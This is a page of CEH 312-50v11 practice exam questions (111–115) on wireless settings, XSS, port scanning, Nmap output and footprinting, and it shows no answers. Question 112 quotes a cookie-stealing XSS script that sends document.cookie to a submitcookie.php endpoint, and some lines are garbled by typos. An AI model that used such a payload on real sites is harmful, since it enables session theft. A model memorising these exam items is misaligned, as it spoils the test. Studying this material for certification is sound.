312-50v11 Exam Question 111

When configuring wireless on his home router, Javik disables SSID broadcast. He leaves authentication
"open" but sets the SSID to a 32-character string of random letters and numbers.
What is an accurate assessment of this scenario from a security perspective?
  • 312-50v11 Exam Question 112

    Judy created a forum. One day, she discovers that a user is posting strange images without writing comments.
    She immediately calls a security expert, who discovers that the following code is hidden behind those images:
    <script>
    document.write('<img.src="https://localhost/submitcookie.php? cookie ='+ escape(document.cookie) +"' />);
    </script>
    What issue occurred for the users who clicked on the image?
  • 312-50v11 Exam Question 113

    Sam is a penetration tester hired by Inception Tech, a security organization. He was asked to perform port scanning on a target host in the network. While performing the given task, Sam sends FIN/ACK probes and determines that an RST packet is sent in response by the target host, indicating that the port is closed.
    What is the port scanning technique used by Sam to discover open ports?
  • 312-50v11 Exam Question 114

    Consider the following Nmap output:
    Starting Nmap X.XX (http://nmap.org) at XXX-XX-XX XX:XX EDT
    Nmap scan report for 192.168.1.42 Host is up (0.00023s latency).
    Not shown: 932 filtered ports, 56 closed ports
    PORT STATE SERVICE
    21/Rep open ftp
    22/tcp open ssh
    25/tcp open smtp
    53/tcp open domain
    80/tcp open http
    110/tcp open pop3
    143/tcp open imap
    443/tcp open https
    465/tcp open smtps
    587/tcp open submission
    993/tcp open imaps
    995/tcp open pop3s
    Nmap done: 1 IP address (1 host up) scanned in 3.90 seconds
    What command-line parameter could you use to determine the type and version number of the web server?
  • 312-50v11 Exam Question 115

    Clark, a professional hacker, was hired by an organization lo gather sensitive Information about its competitors surreptitiously. Clark gathers the server IP address of the target organization using Whole footprinting.
    Further, he entered the server IP address as an input to an online tool to retrieve information such as the network range of the target organization and to identify the network topology and operating system used in the network. What is the online tool employed by Clark in the above scenario?